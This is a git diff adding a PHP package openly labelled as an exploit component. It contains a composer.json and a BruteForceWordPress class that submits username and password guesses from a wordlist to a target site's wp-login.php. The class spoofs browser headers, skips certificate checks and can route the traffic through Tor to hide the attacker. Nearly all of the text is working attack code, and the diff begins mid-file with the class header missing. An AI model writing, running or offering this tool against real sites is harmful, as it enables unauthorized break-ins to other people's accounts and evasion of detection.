diff --git a/composer.json b/composer.json new file mode 100644 index 0000000..87eab27 --- /dev/null +++ b/composer.json @@ -0,0 +1,33 @@ +{ + "name": "lenonleite/exploits", + "type": "library", + "description": "AsZone/Avenger Component - Exploit", + "keywords": ["exploit","Local File Download","Brute Force","WordPress","avenger","aszone","hacker","hacking","attack", "attacking"], + "homepage": "http://www.lenonleite.com.br", + "license": "MIT", + "authors": [ + { + "name": "Lenon Leite", + "email": "lenonleite@gmail.com.br", + "homepage": "http://www.lenonleite.com.br" + }, + { + "name": "ASZone", + "homepage": "https://www.aszone.com.br" + } + + ], + "require": { + "php": ">=5.3.9", + "guzzlehttp/guzzle":"~5.3", + "symfony/dom-crawler":"~2.8", + "symfony/css-selector":"2.8", + "aszone/fakeheaders": "~0.1" + }, + "autoload": { + "psr-4": { + "Aszone\\Exploits\\": "src/" + } + }, + "minimum-stability": "dev" +} diff --git a/src/BruteForceWordPress.php b/src/BruteForceWordPress.php new file mode 100644 index 0000000..a89676b --- /dev/null +++ b/src/BruteForceWordPress.php @@ -0,0 +1,122 @@ +commandData = array_merge($this->defaultEnterData(), $commandData); + $this->folderDownload = __DIR__."/../../../../results/exploits/wordpress/"; + + } + + private function defaultEnterData() + { + $dataDefault['dork'] = false; + $dataDefault['pl'] = false; + $dataDefault['tor'] = false; + $dataDefault['torl'] = false; + $dataDefault['virginProxies'] = false; + $dataDefault['proxyOfSites'] = false; + + return $dataDefault; + } + + public function sendDataToLoginWordPress($username, $password, $target) + { + try { + $cookie = 'cookie.txt'; + + $postdata = 'log='.$username.'&pwd='.$password.'&wp-submit=Log%20In&redirect_to='.$target.'wp-admin/&testcookie=1'; + $ch = \curl_init(); + $header = new FakeHeaders(); + if ($this->isHttps($target)) { + curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); + } + curl_setopt($ch, CURLOPT_URL, $target.'wp-login.php'); + curl_setopt($ch, CURLOPT_USERAGENT, $header->getUserAgent()['User-Agent']); + curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); + curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); + curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie); + curl_setopt($ch, CURLOPT_REFERER, $target.'wp-admin/'); + curl_setopt($ch, CURLOPT_COOKIEFILE, $cookie); + curl_setopt($ch, CURLOPT_POSTFIELDS, $postdata); + curl_setopt($ch, CURLOPT_POST, 1); + curl_setopt($ch, CURLOPT_TIMEOUT, 30); + curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 30); + + if (!empty($this->tor)) { + curl_setopt($ch, CURLOPT_PROXY, $this->tor); + curl_setopt($ch, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5); + curl_setopt($ch, CURLOPT_VERBOSE, 0); + } + + $result['body'] = curl_exec($ch); + $result['status'] = curl_getinfo($ch); + + curl_close($ch); + + //Check if only login is https, if is https return method with target correcty + if ($this->isHttps($result['status']['url']) and is_null($this->isHttps($target))) { + $this->target = $result['status']['url']; + $baseUrlHttps = $this->getBaseUrlWordPressByUrl($result['status']['url']); + $result = $this->sendDataToLoginWordPress($username, $password, $baseUrlHttps); + } + + return $result; + } catch (\Exception $e) { + echo $e->getMessage(); + $result['body'] = $e->getMessage(); + $result['status'] = $e->getCode(); + exit(); + } + + return $result; + } + + public function getWordListInArray($wordlist = '') + { + if (empty($wordlist)) { + + $wordlist = __DIR__ . '/resource/litleWordListPt.txt'; + $arrWordlist = file($wordlist, FILE_IGNORE_NEW_LINES); + return $arrWordlist; + } + + $checkFileWordList = v::file()->notEmpty()->validate($wordlist); + if ($checkFileWordList) { + $targetResult = file($wordlist, FILE_IGNORE_NEW_LINES); + + return $targetResult; + } + + return false; + } + +} \ No newline at end of file